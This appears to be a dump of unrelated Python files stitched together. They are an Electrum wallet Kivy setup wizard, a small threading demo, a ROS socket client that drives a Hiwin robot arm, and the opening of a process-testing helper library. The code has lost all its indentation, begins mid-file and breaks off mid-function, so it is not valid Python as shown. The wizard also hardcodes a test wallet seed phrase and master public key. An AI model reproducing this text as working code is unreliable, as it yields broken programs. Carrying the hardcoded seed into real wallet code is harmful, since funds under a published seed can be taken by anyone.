is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: 0, 0, 0, .9
Rectangle:
size: Window.size
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum.mnemonic import Mnemonic
from electrum.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
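# Accept words from both the current Electrum wordlist and the legacy (old_mnemonic) one when suggesting completions.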
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
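# Work out which letters can still extend the current prefix, then disable the on-screen keys that cannot.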
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, False)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
test.py
|
import threading
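# Two threads hand control back and forth: each waits on its own Event, clears it, prints, then sets the other thread's Event.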
def app(x, eventForApp, eventForSet):
for i in range(1):
eventForApp.wait()
eventForApp.clear()
if x == 0:
print("hello")
if x == 1:
print("fuck")
eventForSet.set()
e1 = threading.Event()
e2 = threading.Event()
t1 = threading.Thread(target=app, args=(0, e1, e2))
t2 = threading.Thread(target=app, args=(1, e2, e1))
t1.start()
t2.start()
e1.set()
t1.join()
t2.join()
|
Hiwin_RT605_ArmCommand_Socket_20190627194935.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
data = '0' #initial value of the data to transmit
Arm_feedback = 1 #assume the arm is busy
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
return # PEP 479: raising StopIteration inside a generator is an error in Python 3.7+
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
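# Usage pattern (as in Socket_command below):
# for case in switch(value):
# if case(SOME_CONSTANT):
# ...handle this case...
# break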
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #encode with utf-8; other encodings exist, but utf-8 is fine for str
def get_recieve(self):
data = self.s.recv(1024) #1024 is the buffer size, i.e. how many bytes to receive at once
data.decode('utf-8')
return data
def close(self):
self.s.close()
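# Minimal usage sketch (assumes the arm controller is reachable at 192.168.0.1:8080):
# c = client()
# c.get_connect()
# c.send(command_string)
# reply = c.get_recieve()
# c.close()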
#Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ##receive pose data sent from the strategy side
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##receive arm mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
#the queued command is sent by the Socket_feedback() loop once the connection is up
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##receive arm speed-mode data sent from the strategy side
socket_cmd.Speedmode = speedmode
def socket_talker(): ##create the server (publisher) node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket packet transmission--------------##
##---------------send arm commands over the socket-----------------
def Socket_command(s):
global arm_mode_flag,data
#s is the already-connected client instance passed in by the caller
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action = 6 ##switch back to the initial mode state
print(data)
print("Socket:", s)
#Socket.send(data.encode('utf-8')) #socket send: encode the str before transmitting
s.send(data)
##-----------socket client--------
def socket_client():
#global Socket
try:
Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.get_recieve())
Socket_feedback(Socket)
# while 1:
# feedback_str = Socket.recv(1024)
# #arm side reports the arm state
# if str(feedback_str[2]) == '48':# F: arm is Ready and can accept the next motion command
# state_feedback.ArmState = 0
# if str(feedback_str[2]) == '49':# T: arm is busy and cannot execute the next motion command
# state_feedback.ArmState = 1
# if str(feedback_str[2]) == '54':# 6: strategy finished
# state_feedback.ArmState = 6
# print("shutdown")
# #check the sent flag
# if str(feedback_str[4]) == '48':#returns 0 (false)
# state_feedback.SentFlag = 0
# if str(feedback_str[4]) == '49':#returns 1 (true)
# state_feedback.SentFlag = 1
# ##---------------send arm commands over the socket: end-----------------
# if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
# break
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
Socket_command(Socket)
feedback_str = Socket.get_recieve()
#arm side reports the arm state
if str(feedback_str[2]) == '48':# F: arm is Ready and can accept the next motion command
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T: arm is busy and cannot execute the next motion command
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6: strategy finished
state_feedback.ArmState = 6
print("shutdown")
#check the sent flag
if str(feedback_str[4]) == '48':#returns 0 (false)
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#returns 1 (true)
state_feedback.SentFlag = 1
##---------------send arm commands over the socket: end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket packet transmission end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6 ##switch back to the initial mode state
## multithreading
t = threading.Thread(target=socket_client)
t.start() # start the worker thread
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## multithreading end
|
process_tests.py
|
from __future__ import print_function
import errno
import os
import socket
import subprocess
import sys
import threading
import time
from contextlib import contextmanager
from logging import getLogger
try:
import fcntl
except ImportError:
fcntl = False
try:
import Queue
except ImportError:
import queue as Queue
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
try:
import unittest2 as unittest
except ImportError:
import unittest
__version__ = '2.1.2'
logger = getLogger(__name__)
BAD_FD_ERRORS = tuple(getattr(errno, name) for name in ['EBADF', 'EBADFD', 'ENOTCONN'] if hasattr(errno, name))
PY3 = sys.version_info[0] == 3
class BufferingBase(object):
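# Non-blocking reader: puts the wrapped file descriptor into O_NONBLOCK mode and accumulates whatever is available into an in-memory buffer (requires fcntl).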
BUFFSIZE = 8192
ENCODING = "utf8"
def __init__(self, fh):
self.buff = StringIO()
fd = fh.fileno()
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.fd = fd
def read(self):
"""
Read any available data fd. Does NOT block.
"""
try:
while 1:
data = os.read(self.fd, self.BUFFSIZE)
if not data:
break
try:
data = data.decode(self.ENCODING)
except Exception as exc:
logger.exception("%r failed to decode %r: %r", self, data, exc)
raise
self.buff.write(data)
except OSError as exc:
if exc.errno not in (
errno.EAGAIN, errno.EWOULDBLOCK,
errno.EINPROGRESS
):
logger.exception("%r failed to read from FD %s: %r", self, self.fd, exc)
return self.buff.getvalue()
def reset(self):
self.buff = StringIO()
def cleanup(self):
pass
class ThreadedBufferingBase(BufferingBase):
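# Fallback reader for platforms without fcntl (e.g. Windows): a background thread readline()s into a queue that read() drains.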
def __init__(self, fh):
self.buff = StringIO()
self.fh = fh
self.thread = threading.Thread(target=self.worker)
self.thread.start()
self.queue = Queue.Queue()
def worker(self):
while not self.fh.closed:
try:
data = self.fh.readline()
if data:
self.queue.put(data)
else:
time.sleep(1)
except OSError as exc:
logger.exception("%r failed to read from %s: %r", self, self.fh, exc)
raise
def read(self):
while 1:
try:
data = self.queue.get_nowait()
except Queue.Empty:
break
try:
if isinstance(data, bytes):
data = data.decode(self.ENCODING)
except Exception as exc:
logger.exception("%r failed to decode %r: %r", self, data, exc)
raise
self.buff.write(data)
return self.buff.getvalue()
def cleanup(self):
self.thread.join()
class TestProcess(BufferingBase if fcntl else ThreadedBufferingBase):
__test__ = False
def __init__(self, *args, **kwargs):
kwargs.setdefault('env', os.environ)
kwargs.setdefault('bufsize', 1)
kwargs.setdefault('universal_newlines', True)
self.proc = subprocess.Popen(
args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
close_fds=sys.platform != "win32",
**kwargs
)
super(TestProcess, self).__init__(self.proc.stdout)
@property
def is_alive(self):
return self.proc.poll() is None
def signal(self, sig):
self.proc.send_signal(sig)
def __repr__(self):
return "TestProcess(pid=%s, is_alive=%s)" % (self.proc.pid, self.is_alive)
def __enter__(self):
return self
def __exit__(self, exc_type=None, exc_value=None, exc_traceback=None):
try:
for _ in range(5):
if self.proc.poll() is not None:
return
time.sleep(0.2)
for _ in range(5):
if self.proc.poll() is None:
try:
self.proc.terminate()
except Exception as exc:
if exc.errno == errno.ESRCH:
return
else:
logger.exception("%r failed to terminate process: %r", self, exc)
else:
return
time.sleep(0.2)
try:
logger.critical('%s killing unresponsive process!', self)
self.proc.kill()
except OSError as exc:
if exc.errno != errno.ESRCH:
raise
finally:
try:
data, _ = self.proc.communicate()
try:
if isinstance(data, bytes):
data = data.decode(self.ENCODING)
except Exception as exc:
logger.exception("%s failed to decode %r: %r", self, data, exc)
raise
self.buff.write(data)
except IOError as exc:
if exc.errno != errno.EAGAIN:
logger.exception('%s failed to cleanup buffers: %r', self, exc)
except Exception as exc:
logger.exception('%s failed to cleanup buffers: %r', self, exc)
try:
self.cleanup()
except Exception as exc:
logger.exception('%s failed to cleanup: %r', self, exc)
close = __exit__
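# Illustrative usage sketch (the script name is hypothetical):
# with TestProcess(sys.executable, 'my_service.py') as proc:
# with dump_on_error(proc.read):
# wait_for_strings(proc.read, 10, 'ready')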
class TestSocket(BufferingBase if fcntl else ThreadedBufferingBase):
__test__ = False
BUFFSIZE = 8192
def __init__(self, sock):
self.sock = sock
if PY3:
self.fh = sock.makefile('rbw', buffering=1)
else:
self.fh = sock.makefile(bufsize=0)
if fcntl:
sock.setblocking(0)
super(TestSocket, self).__init__(sock)
else:
super(TestSocket, self).__init__(self.fh)
def __enter__(self):
return self
def __exit__(self, exc_type=None, exc_value=None, exc_traceback=None):
try:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
except (OSError, socket.error) as exc:
if exc.errno not in BAD_FD_ERRORS:
raise
close = __exit__
def wait_for_strings(cb, seconds, *strings):
"""
This checks that *strings appear in cb(), IN THE GIVEN ORDER!
"""
start = time.time()
while True:
buff = cb()
check_strings = list(strings)
check_strings.reverse()
for line in buff.splitlines():
if not check_strings:
break
